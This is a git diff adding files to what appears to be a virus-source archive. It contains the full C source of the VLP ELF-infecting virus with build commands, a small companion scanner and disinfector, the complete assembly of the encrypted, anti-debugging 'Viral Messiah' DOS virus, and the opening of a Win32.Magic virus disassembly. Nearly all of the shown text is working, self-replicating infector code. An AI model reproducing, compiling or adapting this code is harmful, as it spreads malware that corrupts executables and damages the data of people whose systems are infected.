',0dh,0ah,0,0 +graf: db 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32 + db 32,01,01,01,01,01,01,32,32,01,01,01,01,01,01,32 + db 01,32,32,32,32,32,32,01,01,32,32,32,32,32,32,01 + db 01,32,01,32,32,01,32,01,01,32,01,32,32,01,32,01 + db 01,32,32,32,32,32,32,01,01,32,32,32,32,32,32,01 + db 01,32,01,01,01,01,32,01,01,32,01,01,01,01,32,01 + db 32,01,32,32,32,32,01,32,32,01,32,32,32,32,01,32 + db 32,32,01,01,01,01,32,32,32,32,01,01,01,01,32,32 +kiirv: db 0 +start ends + end + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.vlp1.c b/MSDOS/Virus.MSDOS.Unknown.vlp1.c new file mode 100644 index 00000000..fb7af23f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vlp1.c @@ -0,0 +1,710 @@ + +/* --- Cut - Begin MAIN.C --- */ + +/* This is VLP I . Another method to infect ELF-execs. + * Copyright (C) 1997 by Stealthf0rk of S V A T + * This Virii contains *no* malicious code, but due to + * bugs it is possible that you may get some damage on your system. + * You use this progrma(s) on your own risk ! ! ! + * I'm not responsible for any damage you may get due to playing around + * with this. Only run VLP with permission of the owner of the system you + * wish to test VLP on. + * + * virii: $ cc -O2 -DDEBUG main.c get.c file_ops.c -o virii + * $ strip virii + * nacs: $ cc -O2 nacs.c get.c file_ops.c + * + * greets to NetW0rker and naleZ + * + * how it works + * in bash pseudo_code: + * + * find hostfile + * cp hostfile tmp + * grep THE_VIRCODE argv[0] > hostfile + * cat tmp >> hostfile + * grep THE_OLD_APPENDED_CODE_ON_ARGV[0] argv[0] > tmp + * tmp + * + * + * if you wanna contact the SVAT-group, write to + * stealthf0rk, stealth@cyberspace.org + */ + +#include "vx.h" +#include +#include +#include + +/* The filedescriptor for the LOG-file */ + +#ifdef DEBUG +FILE *fd; +#endif + +int main(int argc, char **argv, char **envp) +{ + char *s, *s2, *path, *dir; + int i; + char from[200]; + +#ifdef DEBUG + /* If U are angry do this: + * setenv("PATH", "/root/VTEST/bin:/root/VTEST/bad:/root/VTEST/usr/bin:/root/VTEST/bad2", 1); + */ + fd = fopen(TRACEFILE, "a"); +#endif + DFPRINTF("====== tracefile of stealthf0rk's VLP ==========\n"); + path = getenv("PATH"); + s = whereis(path, argv[0]); /* return only static! -> */ + if (strcpy(from, s) == NULL) /* so we need a copy */ + return -1; + DFPRINTF("@f main: file of action is <%s>\n", from); + i = infect(3, from); + exechost(from, argv, envp); + return 0; +} + +/* --- Cut - End MAIN.C --- */ + + +/* --- Cut - Begin FILE_OPS.C --- */ + +/* Thiz file contains the routines for writing the code etc. */ + +#include /* .h files maybe different in different OS */ +#include +#include +#include +#include +#include +#include + +#include "vx.h" + +#define TEMP "/tmp/temp" /* with this generate the name of the EXE */ +#define TMP "/tmp/tmp" /* */ + +/*------------------------------*/ + +#ifdef DEBUG +extern FILE *fd; /* debugging */ +#endif + +struct utimbuf { + time_t actime; + time_t modtime; +}; + +/* ATA, ATH, ATD ... not found in my .h's */ + +extern int utime(char *, struct utimbuf*); + +/* infect files , Auftraggeber is */ + +int infect(int anz, char *caller) +{ + int i = 0, j = 0; + char *dir, *f, *path; + + char file[200]; + struct stat status; /* save time ... */ + + path = getenv("PATH"); + if ((dir = getdir(path)) == NULL) /* find directory */ + return -1; + + while (i < anz && j < 10) { /* times */ + DFPRINTF("------------- new infection stack ----------\n"); + DFPRINTF("@f infect: directory of infection is <%s>\n", dir); + j++; + if ((f = gethost(dir, FILEPATH)) == NULL) + continue; + strcpy(file, f); + if (saveattribs(file, &status) < 0) + continue; + if (infect_host(file, caller) < 0) + continue; + if (restoreattribs(file, status) < 0) + continue; + i++; + j = 0; + DFPRINTF("@f infect: infected file is <%s>\n", file); + } + return i; +} + + +/* infect directly */ + +int infect_host(char *host, char *caller) +{ + int in,out, + r,w; + const int vlength = VLENGTH; + char *buff; + + if ((buff = (char*)malloc(vlength)) == NULL) + return -1; + +/* copy to tempfile, open and truncate [the host] + * and copy the beginning (virus, vlength byte) of the running + * program [file 'caller'] to it. + */ + if (cp(host, TMP) == -1) + return -1; + + DFPRINTF("@f infect_host: copied <%s> to <%s> \n", host, TMP); + if ((in = open(caller, O_RDONLY)) == -1) + return -1; + if ((out = open(host, O_RDWR|O_TRUNC)) == -1) + return -1; + DFPRINTF("@f infect_host: opened host <%s> and caller <%s>\n", host, caller); + if ((r = read(in, buff, vlength)) == -1) + return -1; + if ((w = write(out, buff, vlength)) == -1) + return -1; + close(in); + if ((in = open(TMP, O_RDWR)) == -1) + return -1; + +/* append the rest of the original file to the host -> end of infection */ + + while ((r = read(in, buff, vlength)) > 0) { + if ((w = write(out, buff, r)) == -1) + return -1; + } + close(in); + close(out); + free(buff); + DFPRINTF("@f infect_host: try to remove <%s>\n", TMP); + remove(TMP); + return 0; +} + + + +/* -------------------- isinfected --------------------- + * look if a 'detectstring' appears at the end of 'ffile' + * return 1 if so, 0 if not + */ + +int isinfected (char *ffile) +{ + int out,r = 0; + char cmp[4] = {0}; + + DFPRINTF("@f isinfected: look at <%s>\n", ffile); + if ((out = open(ffile, O_RDONLY)) == -1) + return -1; + if ((r = lseek(out, VLENGTH + 1, SEEK_SET)) == -1) + return -1; + if ((r = read (out, cmp, 3)) == -1) + return -1; + if (strcmp("ELF", cmp) == 0) { + close(out); + return 1; + } else + { + close(out); + return 0; + } +} + +/* ------------ iself ------------ + * look if 'host' is ELF + * return 1 if so, 0 if not + * [buggy: an objectfile is also elf as a full executable {:-(8 ] + */ + +int iself(char *host) +{ + int in, + r = 0; + char mn[5] = {0x7f,0x45,0x4c,0x46,'\0'}, /* .ELF */ + buff[5] = {'\0'}; + DFPRINTF("@f iself: look at file <%s>\n", host); + if ((in = open(host, O_RDONLY)) == -1) + return -1; + if ((r = read(in, buff,4)) == -1) + return -1; + if (strcmp(buff, mn) == 0) { + close (in); + return 1; + } + else { + close (in); + return 0; + } +} + +/* isclean() returns 1 if 'file' is clean + * and 0 if not - "clean" means healty, + * ELF-executable and normal file (not dir ...) + */ + +int isclean(char *file) +{ + if (isregular(file) == 0) /* prove this first !!! */ + return 0; + if (isinfected(file) == 1) + return 0; + if (iself(file) == 0) + return 0; + return 1; +} + +/* is a normal one ? (links are, directorys not) + * returns 1 if so + */ + + +int isregular(char *file) +{ + struct stat status; + + DFPRINTF("@f isregular: <%s>\n", file); + if (stat(file, &status) == -1) + return 0; + if (!S_ISREG(status.st_mode)) + return 0; + else + return 1; +} + + +/* --------------- exechost ------------------ + * execs the file wich follows the virii and wich must + * be seppareted + */ + +int exechost(char *caller, char **arglist, char **envlist) +{ + + int i, j, in, out, + r, w; + char *buff; + const int vlength = VLENGTH; + char tempfile[20]; + struct stat status; + + + DFPRINTF("@f exechost: caller = <%s> argv[0] = <%s>\n", caller, arglist[0]); + DFPRINTF("=========== end of report =============\n"); +#ifdef DEBUG + if (fd != stdout) + fclose(fd); +#endif + + if ((buff = (char*)(malloc(vlength))) == NULL) + return -1; +/* copy rest out of the program */ + + if ((in = open(caller, O_RDONLY)) == -1) + return -1; + +/* Since the files wich are just executed are locked (can't be opened for + * writing) and more than one of them can run at the same time [that means + * also more that one of a infected file ...] under UNIX we have to search + * for the next tempfile (/tmp/tempXYZ) we can use. + */ + out = -1; + j = 0; + while (out < 0) { + sprintf(tempfile, "%s%d", TEMP, j++); + out = open(tempfile, O_RDWR|O_CREAT|O_TRUNC); + } + + +/* from position 'vlength' ,the virus ends there */ + + if (lseek(in, vlength, SEEK_SET) == -1) + return -1; + while ((r = read(in, buff, vlength)) > 0) { + if ((w = write(out, buff, r)) == -1) + return -1; + } + close(in); + close(out); + free(buff); + + /* put the ORIGINAL attribs of the file to the tempfile */ + saveattribs(caller, &status); + restoreattribs(tempfile, status); + + execve(tempfile, arglist, envlist); + while (1); +} + + +/* ------------------------------- cp ---------------------------- + * copy 'oldfile' to 'newfile' ,don't look for permissons + */ + +int cp(char *oldfile,char *newfile) + { + char *buff; + int nf,of,r,w; + + if ((buff = (char*)malloc(5000)) == NULL) + return -1; + if ((of = open(oldfile, O_RDONLY)) == -1) + return -1; + if ((nf = open(newfile, O_RDWR|O_CREAT|O_TRUNC)) == -1) + return -1; + while ((r = read(of, buff, 5000)) > 0) { + if ((w = write(nf, buff, r)) == -1) + return -1; + } + DFPRINTF("@f cp: successfull copy of %s to %s\n", oldfile, newfile); + free(buff); + close(nf); + close(of); + return 0; + } + +/*---------------------------------------------*/ + +int saveattribs(char *host, struct stat *status) +{ + return stat(host, status); +} + +/*---------------------------------------------*/ + +int restoreattribs(char *host, struct stat status) +{ + struct utimbuf time; + int retval; + + if ((retval = chmod(host, status.st_mode)) < 0) + return retval; + time.actime = status.st_atime; + time.modtime = status.st_mtime; + return utime(host, &time); +} + +/* --- Cut - End FILE_OPS.C --- */ + + + +/* --- Cut - Begin GET.C --- */ + +/* this file contains the functions for find first/next :) + * and all the others ... + */ +#include +#include +#include +#include +#include +#include +#include "vx.h" + +#ifdef DEBUG +extern FILE *fd; +#endif + +/* the same as 'whereis' on the shell + * ATTENTION - return only static - t.m. you can't + * use it for further actions.At the next call of whereis() the + * buffer will be overwritten !!! + * So its need to save the return in a copy before we call whereis() + * again. + */ + +char *whereis(char *path, char *prog) +{ +#define IN_PATH path - _begin < pathlen + 2 + + static char file[200]; + int i = 0, pathlen; + char *_begin; + struct stat status; + + _begin = path; + pathlen = strlen(path); + if (strstr(prog,"/") != NULL) /* if its entered with path */ + return prog; /* -> gotcha */ + memset(file,'\0',200); + + /* Loop until found or the pointer is not longer "in path". + * [the strXYZ() functions fuzzy the best debugger. + * If you want feel free to debug the virus. :-> ] + */ + + while (access(file, X_OK) != 0 && IN_PATH) { + i = strcspn(path,":"); /* split string into dirs */ + strcpy(file, ""); /* only for '\0' ! */ + strncat(file, path, i); + strcat(file, "/"); + strcat(file, prog); + path = path + i + 1; + } + if (!(IN_PATH)) + return NULL; + else { + DFPRINTF("@f whereis: found file <%s>\n", file); + return file; + } +#undef IN_PATH +} + +/* search randomly a directory (one from path) + * and use this for further actions + */ + +char *getdir(char *path) +{ +#define NOT_IN_PATH path - _begin >= pathlen +#define RANDNUM (int)((double)strlen(path)*rand()/(RAND_MAX + 1.0)) + + static char dir[100]; + int n, r, not_found = 1, pathlen; + char *_begin; + static first = 1; + + _begin = path; + pathlen = strlen(path); + + memset(dir,'\0',100); + if (first) + srand(getpid()); + first = 0; + + while (not_found) { + r = RANDNUM; + path += r; + if (r != 0) { + path += strcspn(path, ":"); + path ++; + } + if (NOT_IN_PATH) { + path = _begin; + continue; + } + not_found = 0; + n = strcspn(path, ":"); + strcpy(dir, ""); /* ... */ + strncat(dir, path, n); + strcat(dir,""); /* needed ??? ... */ + } + DFPRINTF("@f getdir: found directory <%s>\n", dir); + return dir; + +#undef NOT_IN_PATH +#undef RANDNUM +} + +/* Search in 'dir' until a "good" file is found + * or all of them are seen as "bad" . + * In this case we come back later :-) . + * If flag == 1 return includes path, if flag == 0 not. + */ + +char *gethost(char *dir, int flag) +{ +#define RANDNUM (int)((double)(found)*rand()/(RAND_MAX + 1.0)) /* uff */ + + static int first = 1, gen = 0; + int r, i = 0; + static struct dirent **filelist; + char *host, *path; + static int found; + + path = getenv("PATH"); + + /* Only 'randomize' at the first call . + * Use scandir() to read out the directory. + */ + if (first) { + if ((found = scandir(dir, &filelist, 0, 0)) <= 0) + return NULL; + srand(getpid()); + } + r = RANDNUM; + + /* Get one of the file randomly. */ + + if ((host = whereis(path, filelist[r]->d_name)) == NULL) + return NULL; + /* isclean means ready for infection: NOT a directory + * NOT a textfile and NOT infected + */ + while (isclean(host) != 1 && i < found) { + r = RANDNUM; + if((host = whereis(path, filelist[r]->d_name)) == NULL) + return NULL; + i++; + } + first = 0; + if (i >= found) + return NULL; + else { + DFPRINTF("@f gethost: got host <%s>\n", host); + if (flag == 0) + return filelist[r]->d_name; /* static */ + if (flag == 1) + return host; /* static, da host ein statischer */ + else /* return von *whereis(...) ist */ + return NULL; + } +#undef RANDNUM +} + +/* --- Cut - End GET.C --- */ + + + +/* --- Cut - Begin VX.H --- */ + +#include + +#define FILEONLY 0 +#define FILEPATH 1 +#define VLENGTH 8000 /* you may have to change this value */ + +/* be sure that /root/VTEST exists if DEBUG is turned on ... */ + +#ifdef DEBUG + #define TRACEFILE "/root/VTEST/VIRtrace" + #define DFPRINTF(format, args...) fprintf(fd, format, ##args) +#else + #define DFPRINTF(format,args...) +#endif + + +int infect(int, char*); +int exechost(char*, char**, char**); +int isinfected(char*); +int iself(char*); +int cp(char*, char*); +int restoreattribs(char*, struct stat); +int saveattribs(char*, struct stat*); +int infect_host(char*, char*); +int isclean(char*); +int isregular(char*); + +char *whereis(char*, char*); +char *gethost(char*,int); +char *getdir(char*); + + +/* --- Cut - End VX.H --- */ + + + +/* --- Cut - Begin NACS.C --- */ + +/* Falls er sich mal aus dem Staub macht ... + * + * $ cc -O2 nacs.c get.c file_ops.c -o nacs + * $ strip nacs + * + * NetW0rker/ S V A T + */ + +#include +#include +#include +#include +#include +#include +#include +#include "vx.h" + +#undef DEBUG + +int scan_dir (char*, char*, int); +int disinfect(char*); + +int main (int argc, char *argv[]) +{ + int FLAG = 0; /* == 0 -> nicht saeubern, == 1 saeubern */ + + if (argc < 2) { + printf("\n\n nacs V 0.1 Beta \\/ >< Virusscanner fuer den LDV I\n\n" + "Aufruf: scannt 'directory' mit allen Unterverzeichnissen\n\n"); + exit(0); + } + + if (argc == 4) + FLAG = 1; + scan_dir (argv[1], argv[2], FLAG); + printf ("\n\nnacs: fertig\n\n"); + return 0; +} + +/*------------------------------------------------- */ + +int scan_dir (char *directory, char *logfile, int flag) +{ + FILE *fd; + char *fileapath; + struct dirent **filelist; + struct stat buf; + int count = 0,i = 0; + char *detectstring = "VLP"; + + fd = fopen(logfile, "w+"); /* return egal */ + if ((fileapath = (char*) (malloc (1000))) == NULL) + perror (""), exit (1); + if ((i = scandir (directory, &filelist, 0, 0)) == -1) // dir. scannen + perror (""), exit (2); + for (count = 2; count < i; count++) { /* alle gefundenen Dateien,ausser "." , ".." */ + if ((fileapath = strcpy (fileapath, directory)) == NULL) // Pfad + perror (""), exit (3); + fileapath = strcat (fileapath, "/"); /* Trenner */ + if ((fileapath = strcat (fileapath, filelist[count]->d_name)) == NULL) // + Datei + perror (""), exit (4); + stat (fileapath, &buf); + if ((buf.st_mode & S_IFDIR) == S_IFDIR) /* falls Unterverzeichniss */ + scan_dir (fileapath, logfile, flag); /* rekursiv weiter */ + else { /* sonst scannen */ + printf("\r "); + printf(" \r"); + printf("Datei <%s> ist ", fileapath); + if (isinfected (fileapath)) { + if (fd != NULL) + fprintf(fd, "Datei <%s> ist infiziert.", fileapath); + printf ("infiziert"); + if (flag) { + disinfect(fileapath); + printf(" ... I disinfect ..."); + if (fd != NULL) + fprintf(fd, " ... I disinfect ..."); + } + if (fd != NULL) + fprintf(fd, "\n"); + } + else + printf("sauber"); + fflush(stdout); + } /* else */ + } /* for */ + return count; +} + + +int disinfect(char *file) +{ + int in, out, r; + char *buf; + + buf = (char*)malloc(10000); + if (buf == NULL) + perror(""), exit(1); + cp(file, "./tmp"); + in = open("./tmp", O_RDWR); + out = open(file, O_RDWR|O_TRUNC); + lseek(in, VLENGTH, SEEK_SET); /* ueber virus wegSEEKEN */ + while ((r = read(in, buf, 10000)) > 0) /* cleanen teil kopieren */ + write(out, buf, r); + close(in); + close(out); + remove("./tmp"); + return 0; +} + +/* --- Cut - End NACS.C --- */ + diff --git a/MSDOS/Virus.MSDOS.Unknown.vmessiah.asm b/MSDOS/Virus.MSDOS.Unknown.vmessiah.asm new file mode 100644 index 00000000..a33c83ae --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vmessiah.asm @@ -0,0 +1,340 @@ +; VMESSIAH.ASM -- Viral Messiah Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Nowhere Man + +virus_type equ 1 ; Overwriting Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near +flag: xchg dh,dh + xchg bp,ax + xchg bp,ax + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + mov bx,offset null_vector ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + mov cx,0005h ; Do 5 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + jmp short strt00 ; Success -- skip jump +skip00: jmp end00 ; Skip the routine +strt00: mov si,offset data00 ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + + mov si,offset data00 ; SI points to data + xor dx,dx ; Clear DX +print_loop: lodsb ; Load the next char. into AL + xor ah,ah ; BIOS print char. function + or al,al ; Is the character a null? + je print_done ; If it is, exit + int 017h ; BIOS video interrupt + jmp short print_loop ; Do the next character +print_done: + +end00: mov ax,04C00h ; DOS terminate function + int 021h +main endp + + + db 08Dh,04Eh,054h,059h,0E0h + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,135 ; Allocate 135 bytes on stack + + mov byte ptr [bp - 135],'\' ; Start with a backslash + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 134] ; SI points to 64-byte buffer + int 021h + + call traverse_path ; Start the traversal + +traversal_loop: cmp word ptr [path_ad],0 ; Was the search unsuccessful? + je done_searching ; If so then we're done + call found_subdir ; Otherwise copy the subdirectory + + mov ax,cs ; AX holds the code segment + mov ds,ax ; Set the data and extra + mov es,ax ; segments to the code segment + + xor al,al ; Zero AL + stosb ; NULL-terminate the directory + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 70] ; DX points to the directory + int 021h + + mov dx,offset com_mask ; DX points to "*.COM" + call find_files ; Try to infect a .COM file + jnc done_searching ; If successful the exit + mov dx,offset exe_mask ; DX points to "*.EXE" + call find_files ; Try to infect an .EXE file + jnc done_searching ; If successful the exit + jmp short traversal_loop ; Keep checking the PATH + +done_searching: mov ah,03Bh ; DOS change directory function + lea dx,[bp - 135] ; DX points to old directory + int 021h + + cmp word ptr [path_ad],0 ; Did we run out of directories? + jne at_least_tried ; If not then exit + stc ; Set the carry flag for failure +at_least_tried: mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller +com_mask db "*.COM",0 ; Mask for all .COM files +exe_mask db "*.EXE",0 ; Mask for all .EXE files +search_files endp + +traverse_path proc near + mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment + xor di,di ; DI holds the starting offset + +find_path: mov si,offset path_string ; SI points to "PATH=" + lodsb ; Load the "P" into AL + mov cx,08000h ; Check the first 32767 bytes + repne scasb ; Search until the byte is found + mov cx,4 ; Check the next four bytes +check_next_4: lodsb ; Load the next letter of "PATH=" + scasb ; Compare it to the environment + jne find_path ; If there not equal try again + loop check_next_4 ; Otherwise keep checking + + mov word ptr [path_ad],di ; Save the PATH address for later + mov word ptr [path_ad + 2],es ; Save PATH's segment for later + ret ; Return to caller + +path_string db "PATH=" ; The PATH string to search for +path_ad dd ? ; Holds the PATH's address +traverse_path endp + +found_subdir proc near + lds si,dword ptr [path_ad] ; DS:SI points to the PATH + lea di,[bp - 70] ; DI points to the work buffer + push cs ; Transfer CS into ES for + pop es ; byte transfer +move_subdir: lodsb ; Load the next byte into AL + cmp al,';' ; Have we reached a separator? + je moved_one ; If so we're done copying + or al,al ; Are we finished with the PATH? + je moved_last_one ; If so get out of here + stosb ; Store the byte at ES:DI + jmp short move_subdir ; Keep transfering characters + +moved_last_one: xor si,si ; Zero SI to signal completion +moved_one: mov word ptr es:[path_ad],si; Store SI in the path address + ret ; Return to caller +found_subdir endp + + db 0FEh,0C9h,04Bh,0DFh,06Eh + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 07Dh,0F9h,074h,000h,09Bh + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ch],0 ; Is the file > 65535 bytes? + jne infection_done ; If it is then exit + + cmp word ptr [si + 025h],'DN' ; Might this be COMMAND.COM? + je infection_done ; If it is then skip it + + cmp word ptr [si + 01Ah],(finish - start) + jb infection_done ; If it's too small then exit + + mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,4 ; CX holds bytes to read (4) + mov dx,offset buffer ; DX points to buffer + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + push si ; Save DTA address before compare + mov si,offset buffer ; SI points to comparison buffer + mov di,offset flag ; DI points to virus flag + mov cx,4 ; CX holds number of bytes (4) + rep cmpsb ; Compare the first four bytes + pop si ; Restore DTA address + je infection_done ; If equal then exit + mov byte ptr [set_carry],1 ; Success -- the file is OK + + mov ax,04301h ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + push si ; Save SI through call + call encrypt_code ; Write an encrypted copy + pop si ; Restore SI + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +buffer db 4 dup (?) ; Buffer to hold test data +set_carry db ? ; Set-carry-on-exit flag +infect_file endp + + +data00 db "I am your VIRAL MESSIAH",13,10 + db "Follow me and be redeemed",13,10 + db "Your data doth exist no more",13,10 + db "The FAT holds ashes of your dreams",13,10,0 + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "[Viral Messiah]",0 + db "Nowhere Man, [NuKE] '92",0 + +encrypt_code proc near + mov si,offset encrypt_decrypt; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 8],dx ; Low word of timer is new key + + xor byte ptr [si],1 ; + xor byte ptr [si + 7],1 ; Change all SIs to DIs + xor word ptr [si + 10],0101h; (and vice-versa) + + mov di,offset finish ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + mov si,offset write_stuff ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + mov dx,offset start ; DX points to virus + + call finish ; Encrypt/write/decrypt + + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + mov si,offset start_of_code ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.voodoo.asm b/MSDOS/Virus.MSDOS.Unknown.voodoo.asm new file mode 100644 index 00000000..594ab129 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.voodoo.asm @@ -0,0 +1,655 @@ +comment * + Win32.Magic.7045 + Disassembly by + Darkman/29A + + + + Win32.Magic.7045 is a 7045 bytes runtime/direct action EXE virus. Infects + all files in all directories at drive C:, D:, E: and F:, when executed, by + every file in current directory and Windows directory, when executed, by + prepending the virus to the original EXE file. + + Compile Win32.Magic.7045 with Turbo Assembler v 5.0 by typing: + TASM32 /M /ML /Q /ZD VOODOO.ASM + TLINK32 -Tpe -c -x -aa -r -v VOODOO.OBJ,,, IMPORT32 +* + +.386 +.model flat +; KERNEL32.dll + extrn CopyFileA:proc + extrn CloseHandle:proc + extrn CreateFileMappingA:proc + extrn CreateProcessA:proc + extrn DeleteFileA:proc + extrn CreateFileA:proc + extrn FindFirstFileA:proc + extrn FindNextFileA:proc + extrn FlushViewOfFile:proc + extrn GetCommandLineA:proc + extrn GetCurrentDirectoryA:proc + extrn GetExitCodeProcess:proc + extrn GetFileSize:proc + extrn ExitProcess:proc + extrn GetProcAddress:proc + extrn GetStartupInfoA:proc + extrn GlobalAlloc:proc + extrn GlobalFree:proc + extrn GlobalLock:proc + extrn GlobalUnlock:proc + extrn MapViewOfFile:proc + extrn ReadFile:proc + extrn SetCurrentDirectoryA:proc + extrn SetFileAttributesA:proc + extrn SetFileTime:proc + extrn Sleep:proc + extrn UnmapViewOfFile:proc + extrn lstrcpyA:proc + extrn GetModuleHandleA:proc +; USER32.dll + extrn MessageBoxA:proc + +.data +VirusSize equ 1b85h ; Size of virus (7045 bytes) +nBufferLength equ 320h ; Size, in characters, of directory + ; buffer +MAX_PATH equ 104h + +FALSE equ 00h +TRUE equ 01h +FILE_ATTRIBUTE_DIRECTORY equ 10h + ; The "file or directory" is a + ; directory +FILE_ATTRIBUTE_ARCHIVE equ 20h ; The file is an archive file. + ; Applications use this attribute to + ; mark files for backup or removal. +CREATE_NEW equ 01h ; Creates a new file. The function + ; fails if the specified file already + ; exists. +OPEN_EXISTING equ 03h ; Opens the file. The function fails + ; if the file does not exist. +FILE_SHARE_READ equ 01h ; Other open operations can be + ; performed on the file for read + ; access. If the CreateFile function + ; is opening the client end of a + ; mailslot, this flag is specified. +FILE_SHARE_WRITE equ 02h ; Other open operations can be + ; performed on the file for write + ; access. +GENERIC_WRITE equ 40000000h + ; Specifies write access to the file. + ; Data can be written to the file and + ; the file pointer can be moved. +GENERIC_READ equ 80000000h + ; Specifies read access to the file. + ; Data can be read from the file and + ; the file pointer can be moved. +PAGE_READWRITE equ 04h ; Gives read-write access to the + ; committed region of pages +FILE_MAP_WRITE equ 02h ; Read-write access + +NORMAL_PRIORITY_CLASS equ 20h ; Indicates a normal process with no + ; special scheduling needs. +INVALID_HANDLE_VALUE equ -01h + +STARTUPINFO struct + cb DWORD ? ; Specifies the size, in bytes, of the + ; structure. + lpReserved DWORD ? ; Reserved. Set this member to NULL + ; before passing the structure to + ; CreateProcess + lpDesktop DWORD ? ; Points to a zero-terminated string + ; that specifies either the name of + ; the desktop only or the name of both + ; the window station and desktop for + ; this process + lpTitle DWORD ? ; For console processes, this is the + ; title displayed in the title bar if + ; a new console window is created + dwX DWORD ? ; Specifies the x offset, in pixels, + ; of the upper left corner of a window + ; if a new window is created. The + ; offset is from the upper left corner + ; of the screen + dwY DWORD ? ; Specifies the y offset, in pixels, + ; of the upper left corner of a window + ; if a new window is created. The + ; offset is from the upper left corner + ; of the screen + dwXSize DWORD ? ; Specifies the width, in pixels, of + ; the window if a new window is + ; created + dwYSize DWORD ? ; Specifies the height, in pixels, of + ; the window if a new window is + ; created + dwXCountChars DWORD ? ; Specifies the screen buffer width in + ; character columns + dwYCountChars DWORD ? ; Specifies the screen buffer height + ; in character rows + dwFillAttribute DWORD ? ; Specifies the initial text and + ; background colors if a new console + ; window is created + dwFlags DWORD ? ; This is a bit field that determines + ; whether certain STARTUPINFO members + ; are used when the process creates a + ; window + wShowWindow WORD ? ; Specifies the default value the first + ; time + cbReserved2 WORD ? ; Reserved; must be zero + lpReserved2 DWORD ? ; Reserved; must be NULL + hStdInput DWORD ? ; Specifies a handle that will be used + ; as the standard input handle of the + ; process + hStdOutput DWORD ? ; Specifies a handle that will be used + ; as the standard output handle of the + ; process + hStdError DWORD ? ; Specifies a handle that will be used + ; as the standard error handle of the + ; process +ends + +FILETIME struct + dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of + ; the file time + dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of + ; the file time +ends + +WIN32_FIND_DATA struct + dwFileAttributes DWORD ? ; Specifies the file attributes of the + ; file found + ftCreationTime FILETIME <> ; Specifies the time the file was + ; created + 